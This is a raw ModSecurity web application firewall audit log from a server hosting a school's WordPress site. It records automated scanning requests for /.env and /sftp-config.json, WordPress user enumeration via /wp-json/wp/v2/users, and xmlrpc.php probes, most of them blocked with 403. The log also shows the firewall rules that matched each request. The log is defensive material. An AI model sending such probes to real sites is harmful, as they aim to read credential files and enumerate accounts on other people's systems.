Safari/537.36 --b1c2900a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1c2900a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745491050743583 2526 (- - -) Stopwatch2: 1745491050743583 2526; combined=1289, p1=410, p2=848, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1c2900a-Z-- --837c143b-A-- [24/Apr/2025:17:37:38 +0700] aAoUcslQo524fhbIj1zlwAAAAAE 103.236.140.4 47948 103.236.140.4 8181 --837c143b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.86 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --837c143b-C-- demo.sayHello --837c143b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --837c143b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745491058026213 7015 (- - -) Stopwatch2: 1745491058026213 7015; combined=4948, p1=618, p2=4076, p3=38, p4=42, p5=102, sr=77, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --837c143b-Z-- --45003f76-A-- [24/Apr/2025:17:48:31 +0700] aAoW_95yz20UX9VrdZM-NgAAAFE 103.236.140.4 50628 103.236.140.4 8181 --45003f76-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 64.227.32.66 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 64.227.32.66 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --45003f76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45003f76-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745491711682551 824 (- - -) Stopwatch2: 1745491711682551 824; combined=346, p1=308, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45003f76-Z-- --ab0b8403-A-- [24/Apr/2025:17:57:09 +0700] aAoZBWLuk3f9kLjsdTb5AQAAAIc 103.236.140.4 52676 103.236.140.4 8181 --ab0b8403-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 46.250.232.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 46.250.232.244 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --ab0b8403-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab0b8403-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745492229980302 830 (- - -) Stopwatch2: 1745492229980302 830; combined=317, p1=283, p2=0, p3=0, p4=0, p5=33, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab0b8403-Z-- --49678838-A-- [24/Apr/2025:18:24:42 +0700] aAofeslQo524fhbIj1zocQAAABg 103.236.140.4 59198 103.236.140.4 8181 --49678838-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 Accept-Charset: utf-8 --49678838-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --49678838-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745493882785810 808 (- - -) Stopwatch2: 1745493882785810 808; combined=299, p1=261, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49678838-Z-- --a07f2579-A-- [24/Apr/2025:18:57:59 +0700] aAonR8lQo524fhbIj1zqHgAAAAA 103.236.140.4 38802 103.236.140.4 8181 --a07f2579-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.185 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a07f2579-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a07f2579-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745495879675682 3254 (- - -) Stopwatch2: 1745495879675682 3254; combined=1436, p1=498, p2=907, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a07f2579-Z-- --c5e14e00-A-- [24/Apr/2025:18:58:26 +0700] aAonYslQo524fhbIj1zqPAAAABY 103.236.140.4 39116 103.236.140.4 8181 --c5e14e00-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.185 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c5e14e00-C-- demo.sayHello --c5e14e00-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5e14e00-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745495906874384 5758 (- - -) Stopwatch2: 1745495906874384 5758; combined=4288, p1=584, p2=3471, p3=31, p4=35, p5=98, sr=118, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5e14e00-Z-- --7df56e7f-A-- [24/Apr/2025:19:18:14 +0700] aAosBmLuk3f9kLjsdTb_TgAAAIk 103.236.140.4 46632 103.236.140.4 8181 --7df56e7f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 5 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --7df56e7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7df56e7f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745497094553952 894 (- - -) Stopwatch2: 1745497094553952 894; combined=405, p1=354, p2=0, p3=0, p4=0, p5=51, sr=153, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7df56e7f-Z-- --904dab34-A-- [24/Apr/2025:19:59:24 +0700] aAo1rGLuk3f9kLjsdTYClwAAAIU 103.236.140.4 35648 103.236.140.4 8181 --904dab34-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --904dab34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --904dab34-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745499564521843 2907 (- - -) Stopwatch2: 1745499564521843 2907; combined=1440, p1=489, p2=918, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --904dab34-Z-- --6a8d370e-A-- [24/Apr/2025:19:59:30 +0700] aAo1st5yz20UX9VrdZNGiQAAAEY 103.236.140.4 35680 103.236.140.4 8181 --6a8d370e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.11 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6a8d370e-C-- demo.sayHello --6a8d370e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a8d370e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745499570951074 5530 (- - -) Stopwatch2: 1745499570951074 5530; combined=4502, p1=581, p2=3550, p3=31, p4=36, p5=166, sr=75, sw=138, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a8d370e-Z-- --bc351141-A-- [24/Apr/2025:20:16:19 +0700] aAo5o2Luk3f9kLjsdTYDoQAAAI8 103.236.140.4 39616 103.236.140.4 8181 --bc351141-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-J737A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --bc351141-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc351141-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745500579972684 893 (- - -) Stopwatch2: 1745500579972684 893; combined=366, p1=327, p2=0, p3=0, p4=0, p5=38, sr=130, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc351141-Z-- --c1481d2c-A-- [24/Apr/2025:20:19:45 +0700] aAo6cWLuk3f9kLjsdTYD0AAAAIk 103.236.140.4 40408 103.236.140.4 8181 --c1481d2c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3880.5 Mobile Safari/537.36 Accept-Charset: utf-8 --c1481d2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1481d2c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745500785908804 790 (- - -) Stopwatch2: 1745500785908804 790; combined=356, p1=325, p2=0, p3=0, p4=0, p5=31, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1481d2c-Z-- --21821862-A-- [24/Apr/2025:20:25:00 +0700] aAo7rN5yz20UX9VrdZNHtAAAAFA 103.236.140.4 41660 103.236.140.4 8181 --21821862-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.164 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --21821862-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21821862-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745501100121949 2617 (- - -) Stopwatch2: 1745501100121949 2617; combined=1216, p1=425, p2=761, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21821862-Z-- --b9594b70-A-- [24/Apr/2025:20:25:06 +0700] aAo7smLuk3f9kLjsdTYEEwAAAI8 103.236.140.4 41692 103.236.140.4 8181 --b9594b70-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.164 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b9594b70-C-- demo.sayHello --b9594b70-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9594b70-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745501106663694 5866 (- - -) Stopwatch2: 1745501106663694 5866; combined=4282, p1=582, p2=3454, p3=30, p4=35, p5=105, sr=131, sw=76, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9594b70-Z-- --1b2e733b-A-- [24/Apr/2025:20:27:07 +0700] aAo8K2Luk3f9kLjsdTYEUQAAAI0 103.236.140.4 42174 103.236.140.4 8181 --1b2e733b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9 Accept-Charset: utf-8 --1b2e733b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b2e733b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745501227779839 776 (- - -) Stopwatch2: 1745501227779839 776; combined=341, p1=304, p2=0, p3=0, p4=0, p5=37, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b2e733b-Z-- --9ab68a53-A-- [24/Apr/2025:20:29:28 +0700] aAo8uGLuk3f9kLjsdTYEcgAAAIw 103.236.140.4 42728 103.236.140.4 8181 --9ab68a53-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9ab68a53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ab68a53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745501368909594 2866 (- - -) Stopwatch2: 1745501368909594 2866; combined=1284, p1=421, p2=832, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ab68a53-Z-- --deffdb2b-A-- [24/Apr/2025:20:29:36 +0700] aAo8wMlQo524fhbIj1z1EgAAAAI 103.236.140.4 42760 103.236.140.4 8181 --deffdb2b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.194 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --deffdb2b-C-- demo.sayHello --deffdb2b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --deffdb2b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745501376228475 5764 (- - -) Stopwatch2: 1745501376228475 5764; combined=4414, p1=582, p2=3601, p3=35, p4=36, p5=97, sr=73, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --deffdb2b-Z-- --cd64a25d-A-- [24/Apr/2025:20:51:26 +0700] aApB3viVYlyO1xhz7yMw9AAAAMU 103.236.140.4 45458 103.236.140.4 8181 --cd64a25d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.71 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.71 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cd64a25d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd64a25d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745502686681070 3081 (- - -) Stopwatch2: 1745502686681070 3081; combined=1414, p1=446, p2=925, p3=0, p4=0, p5=42, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
